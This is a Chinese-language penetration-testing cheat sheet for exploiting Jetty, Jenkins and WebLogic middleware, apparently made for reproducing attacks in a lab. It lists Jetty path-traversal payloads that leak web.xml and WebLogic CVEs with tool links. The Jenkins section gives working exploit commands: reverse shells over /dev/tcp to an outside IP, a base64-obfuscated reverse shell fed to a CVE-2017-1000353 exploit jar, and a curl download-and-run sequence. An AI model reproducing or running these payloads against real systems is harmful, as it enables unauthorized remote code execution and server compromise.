知识点
1、中间件-Jetty-CVE&信息泄漏
2、中间件-Jenkins-CVE&RCE执行
3、中间件-Weblogic-CVE&反序列化&RCE
4、应用WPS-HW2023-RCE&复现&上线CS
中间件-Jetty- CVE&信息泄漏
Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.
CVE-2021-34429(信息泄露)



CVE-2021-28169(信息泄露)


中间件-Jenkins-CVE& RCE执行
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作、探针
默认端口:8080
cve_2017_1000353


bash -i >& /dev/tcp/1.92.144.175/5566 0>&1

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjE0NC4xNzUvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}"
JDK-1.8.0_291 其他版本失效

python exploit.py http://1.92.144.175:50780 jenkins_poc.ser

CVE-2018-1000861
利用工具:https://github.com/orangetw/awesome-jenkins-rce-2019
bash -i >& /dev/tcp/1.92.144.175/6666 0>&1
python3 -m http.server 8888

python2 exp.py http://1.92.144.175:25257/ "curl -o /tmp/1.sh http://1.92.144.175:8888/11.txt"

python2 exp.py http://1.92.144.175:25257/ "bash /tmp/1.sh"

cve_2019_1003000
需要用户帐号密码:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
中间件-Weblogic-CVE& 反序列化&RCE
Weblogic是Oracle公司推出的J2EE应用服务器。
默认端口:7001
利用工具:https://github.com/KimJun1010/WeblogicTool



CVE-2023-21839(JNDI)
CVE-2020-2551(JRMP)
CVE-2020-2551
CVE-2020-2555
CVE-2020-2883
CVE-2020-14882未授权访问
CVE-2018-2894
CVE-2018-2628(JRMP)
CVE-2018-2893(JRMP)
CVE-2018-3245(JRMP)
CVE_2018_3252(JRMP)
CVE_2018_3191
CVE-2016-3510
CVE-2016-0638
CVE-2017-10271
CVE-2017-3248(JRMP)
CVE-2015-4852